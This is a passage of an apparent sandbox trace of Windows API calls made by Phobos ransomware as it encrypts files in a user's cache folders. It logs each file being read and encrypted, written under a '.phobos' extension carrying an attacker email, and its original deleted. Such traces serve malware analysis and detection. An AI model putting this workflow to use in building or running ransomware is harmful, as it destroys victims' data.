(hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.991] ReadFile (in: hFile=0x16c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x226, lpOverlapped=0x0) returned 1 [0196.993] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x230, dwBufLen=0x230 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x230) returned 1 [0196.993] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x230, lpOverlapped=0x0) returned 1 [0196.993] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329a8) returned 1 [0196.993] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.993] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0196.994] CryptDestroyKey (hKey=0xa329a8) returned 1 [0196.994] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0196.994] CryptDestroyKey (hKey=0xa32b68) returned 1 [0196.994] CloseHandle (hObject=0x16c) returned 1 [0196.994] CloseHandle (hObject=0x170) returned 1 [0196.994] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76")) returned 1 [0196.995] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0196.996] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=400) returned 1 [0196.996] CloseHandle (hObject=0x170) returned 1 [0196.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b")) returned 0x2024 [0196.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0196.996] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.996] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0196.997] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0196.997] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.997] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x190, lpOverlapped=0x0) returned 1 [0196.998] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0) returned 1 [0196.998] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a0, lpOverlapped=0x0) returned 1 [0196.998] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329a8) returned 1 [0196.998] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.998] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.999] CryptDestroyKey (hKey=0xa329a8) returned 1 [0196.999] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.999] CryptDestroyKey (hKey=0xa32b68) returned 1 [0196.999] CloseHandle (hObject=0x170) returned 1 [0196.999] CloseHandle (hObject=0x16c) returned 1 [0196.999] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b")) returned 1 [0197.000] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0197.000] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=358) returned 1 [0197.000] CloseHandle (hObject=0x16c) returned 1 [0197.000] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875")) returned 0x2024 [0197.001] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0197.001] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.001] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.001] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0197.001] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.001] ReadFile (in: hFile=0x16c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x166, lpOverlapped=0x0) returned 1 [0197.002] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x170, dwBufLen=0x170 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x170) returned 1 [0197.002] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x170, lpOverlapped=0x0) returned 1 [0197.003] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329a8) returned 1 [0197.003] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.003] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.003] CryptDestroyKey (hKey=0xa329a8) returned 1 [0197.003] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.003] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.003] CloseHandle (hObject=0x16c) returned 1 [0197.003] CloseHandle (hObject=0x170) returned 1 [0197.003] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875")) returned 1 [0197.004] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.005] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=404) returned 1 [0197.005] CloseHandle (hObject=0x170) returned 1 [0197.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973")) returned 0x2024 [0197.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.005] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.005] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0197.006] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0197.006] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.006] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x194, lpOverlapped=0x0) returned 1 [0197.007] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0) returned 1 [0197.007] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a0, lpOverlapped=0x0) returned 1 [0197.008] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329a8) returned 1 [0197.008] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.008] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.008] CryptDestroyKey (hKey=0xa329a8) returned 1 [0197.008] WriteFile (in: hFile=0x16c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.008] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.008] CloseHandle (hObject=0x170) returned 1 [0197.008] CloseHandle (hObject=0x16c) returned 1 [0197.008] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973")) returned 1 [0197.009] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0197.009] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=268) returned 1 [0197.009] CloseHandle (hObject=0x16c) returned 1 [0197.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406")) returned 0x2024 [0197.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0197.010] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.010] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.010] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0197.010] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.010] ReadFile (in: hFile=0x16c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10c, lpOverlapped=0x0) returned 1 [0197.011] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110, dwBufLen=0x110 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110) returned 1 [0197.011] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110, lpOverlapped=0x0) returned 1 [0197.012] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329a8) returned 1 [0197.012] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.012] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0197.012] CryptDestroyKey (hKey=0xa329a8) returned 1 [0197.012] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0197.012] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.012] CloseHandle (hObject=0x16c) returned 1 [0197.012] CloseHandle (hObject=0x170) returned 1 [0197.012] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406")) returned 1 [0197.013] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.013] CreateFileW 